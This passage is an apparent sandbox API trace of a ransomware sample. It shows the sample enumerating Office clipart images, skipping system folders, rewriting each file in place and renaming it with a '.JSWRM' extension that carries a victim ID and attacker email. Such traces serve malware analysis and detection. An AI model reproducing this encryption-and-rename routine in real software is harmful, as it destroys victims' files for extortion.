lpString2="..") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="...") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="windows") returned -1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="recovery") returned -1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="perflogs") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="documents and settings") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="system volume information") returned -1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2="msocache") returned 1 [0093.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01607U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01607U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01607U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0093.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01607U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01607U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01607U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.817] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.817] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.817] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.821] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.822] CloseHandle (hObject=0x314) returned 1 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0093.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0093.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0093.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0093.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0093.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9abe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01931J.JPG", cAlternateFileName="")) returned 1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2=".") returned 1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="..") returned 1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="...") returned 1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="windows") returned -1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="recovery") returned -1 [0093.823] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="perflogs") returned 1 [0093.824] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="documents and settings") returned 1 [0093.824] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.824] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="system volume information") returned -1 [0093.824] lstrcmpiW (lpString1="PH01931J.JPG", lpString2="msocache") returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01931J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01931J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01931J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01931J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01931J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01931J.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.824] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39614) returned 1 [0093.824] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9ab0) returned 0x24d210 [0093.825] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9ab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9ab0, lpOverlapped=0x0) returned 1 [0093.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.830] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9ab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9ab0, lpOverlapped=0x0) returned 1 [0093.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.831] CloseHandle (hObject=0x314) returned 1 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0093.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0093.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0093.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0093.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.832] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x451e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02028K.JPG", cAlternateFileName="")) returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2=".") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="..") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="...") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="windows") returned -1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="recovery") returned -1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="perflogs") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="documents and settings") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.832] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="system volume information") returned -1 [0093.833] lstrcmpiW (lpString1="PH02028K.JPG", lpString2="msocache") returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02028K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02028K.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02028K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02028K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02028K.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02028K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.833] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17694) returned 1 [0093.833] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4510) returned 0x24d210 [0093.834] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4510, lpOverlapped=0x0) returned 1 [0093.839] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.839] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4510, lpOverlapped=0x0) returned 1 [0093.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.840] CloseHandle (hObject=0x314) returned 1 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0093.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0093.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0093.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.841] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02039U.BMP", cAlternateFileName="")) returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2=".") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="..") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="...") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="windows") returned -1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="recovery") returned -1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="perflogs") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="documents and settings") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="system volume information") returned -1 [0093.841] lstrcmpiW (lpString1="PH02039U.BMP", lpString2="msocache") returned 1 [0093.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02039U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02039U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02039U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0093.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02039U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02039U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02039U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.841] HeapFree 